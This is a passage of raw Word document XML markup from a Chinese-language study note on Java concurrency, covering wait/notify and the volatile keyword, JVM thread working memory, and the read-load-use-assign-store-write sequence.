          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00F41A4C" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> wait</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>notify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00233C0D"/>
    <w:p w:rsidR="009F1A82" w:rsidRPr="00F41A4C" w:rsidRDefault="000969E8" w:rsidP="009F1A82">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.3.2</w:t>
      </w:r>
      <w:r w:rsidR="009F1A82" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0053576E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F1A82" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Java volatile</w:t>
      </w:r>
      <w:r w:rsidR="009F1A82" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00421134" w:rsidRDefault="00421134" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421134">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人皆用之，莫见其形</w:t>
      </w:r>
      <w:r w:rsidR="009A0A5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D961D2" w:rsidRPr="00F41A4C" w:rsidRDefault="009B1992" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>多线</w:t>
      </w:r>
      <w:r w:rsidR="00195783" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>程并发引入同步块</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidR="00217340" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00217340" w:rsidRPr="00F41A4C" w:rsidRDefault="00217340" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>虚拟机栈，每个线程有工作栈，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B1992" w:rsidRPr="00F41A4C" w:rsidRDefault="009B1992" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0037023B" w:rsidRPr="00F41A4C" w:rsidRDefault="00C53922" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>关键字用于声明简单类型变量，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>float</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>等数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00416181">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00EE5AB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> java </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>垃圾回收整理一文中，描述了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>运行时刻内存的分配。其中有一个内存区域是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟机栈，每一个线程运行时都有一个线程栈，线程栈保存了线程运行时候变量值信息。当线程访问某一个对象时候值的时候，首先通过对象的引用找到对应在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆内存</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的变量的值，然后把堆内存变量的具体值</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>到线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00D22CC1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地内存</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，建立一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00483FF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>变量副本</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，之后线程就不再和对象在堆内存变量值有任何关系，而是直接修改副本变量的值，在修改完之后的某一个时刻（线程退出之前），自动把线程变量副本的值回写到对象在堆中变量。这样在堆中的对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>值就产生变化了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5514975" cy="5286375"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1" name="图片 1" descr="java volatil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ava volatile1"/>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5514975" cy="5286375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00EE5AB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">read and load </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从主存复制变量到当前工作内存</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">use and assign  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>执行代码，改变共享变量值</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">store and write </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用工作内存数据刷新主存相关内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00EE5AB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">use and assign </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以多次出现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00EE5AB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但是这一些操作并不是原子性，也就是在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>read load</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之后，如果主内存</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>变量发生修改之后，线程工作内存中的值由于已经加载，不会产生对应的变化，所以计算出来的结果会和预期不一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00EE5AB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修饰的变量，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟机只是保证从主内存加载到线程工作内存的值是最新的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00EE5AB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>例如假如线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>read,load</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作中，发现主内存中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值都是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，那么都会加载这个最新的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00EE5AB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行修改之后，会</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
